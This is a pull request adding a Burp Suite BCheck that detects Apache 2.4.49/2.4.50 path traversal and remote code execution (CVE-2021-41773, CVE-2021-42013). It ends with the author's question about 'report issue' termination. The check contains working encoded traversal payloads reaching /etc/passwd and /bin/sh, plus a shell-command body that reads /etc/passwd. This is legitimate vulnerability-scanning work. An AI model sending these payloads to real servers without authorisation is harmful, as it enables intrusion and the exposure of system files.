### PR TITLE
Create CVE-2021-41773_CVE-2021-42013 Apache-2.4.49-50.bcheck

### DIFF
--- a/vulnerabilities-CVEd/CVE-2021-41773_CVE-2021-42013 Apache-2.4.49-50.bcheck
+++ b/vulnerabilities-CVEd/CVE-2021-41773_CVE-2021-42013 Apache-2.4.49-50.bcheck
@@ -1,0 +1,62 @@
+metadata:
+    language: v2-beta
+    name: "CVE-2021-41773 & CVE-2021-42013 (Apache 2.4.49 and 2.4.50)"
+    description: "Path traversal and RCE tests for CVE-2021-41773 and CVE-2021-42013"
+    author: "r3nt0n"
+    tags: "active", "apache", "cve", "path traversal", "rce"
+
+define:
+    payload_path_trav_49 = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd"
+    payload_rce_49 = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
+    payload_path_trav_50 = "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
+    payload_rce_50 =  "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
+
+given host then
+
+    # Apache 2.4.49 (CVE-2021-41773)
+    send request called path_trav_49:
+        replacing path: `{payload_path_trav_49}`
+
+    if "root:x:0" in {path_trav_49.response} then
+            report issue and continue:
+                name: `Path Traversal (CVE-2021-41773)`
+                severity: high
+                confidence: firm
+                detail: `Path traversal via Apache 2.4.49 (CVE-2021-41773)`
+    end if
+
+    send request called rce_49:
+        replacing path: `{payload_rce_49}`
+        replacing body: `echo Content-Type: text/plain; echo; cat /etc/passwd`
+
+    if "root:x:0" in {rce_49.response} then
+            report issue:  # stop here if find issue, continue if not
+                name: `Remote Code Execution (CVE-2021-41773)`
+                severity: high
+                confidence: firm
+                detail: `Remote code execution via Apache 2.4.49 (CVE-2021-41773)`
+    end if
+
+    # Apache 2.4.50 (CVE-2021-42013)
+    send request called path_trav_50:
+        replacing path: `{payload_path_trav_50}`
+
+    if "root:x:0" in {path_trav_50.response} then
+            report issue and continue:
+                name: `Path Traversal (CVE-2021-42013)`
+                severity: high
+                confidence: firm
+                detail: `Path traversal via Apache 2.4.50 (CVE-2021-42013)`
+    end if
+
+    send request called rce_50:
+        replacing path: `{payload_rce_50}`
+        replacing body: `echo Content-Type: text/plain; echo; cat /etc/passwd`
+
+    if "root:x:0" in {rce_50.response} then
+            report issue:
+                name: `Remote Code Execution (CVE-2021-42013)`
+                severity: high
+                confidence: firm
+                detail: `Remote code execution via Apache 2.4.50 (CVE-2021-42013)`
+    end if


### PR DESCRIPTION
### BCheck Contributions

This Bcheck attempts to detect Apache servers vulnerable to CVE-2021-41773 and CVE-2021-42013.

* [x] BCheck compiles and executes as expected
* [x] BCheck contains appropriate metadata (name, version, author, description and appropriate tags)
* [x] Only .bcheck files have been added or modified
* [x] BCheck is in the appropriate folder
* [x] PR contains single or limited number of BChecks (Multiple PRs are preferred)
* [x] BCheck attempts to minimize false positives

I noticed something strange writing this Bcheck and I could use your help here:

According to the [Bcheck definition reference](https://portswigger.net/burp/documentation/scanner/bchecks/bcheck-definition-reference#actions), when using `report issue` the BCheck should terminate, even if there are parts of the check that have not yet run. I used it to avoid checks on 2.4.50 when the payloads for the .49 raised an issue (i.e. don't check 2.4.50 if 2.4.49 already worked), but I noticed that it keeps performing the four requests anyway. I also tried changing all to `report issue` and not using any `report issue and continue` at all, but it keeps doing the four requests. I could get the desired behavior using additional if-elses, but I would like to avoid it if possible. Could it be some bug, or just something wrong with my Bcheck logic?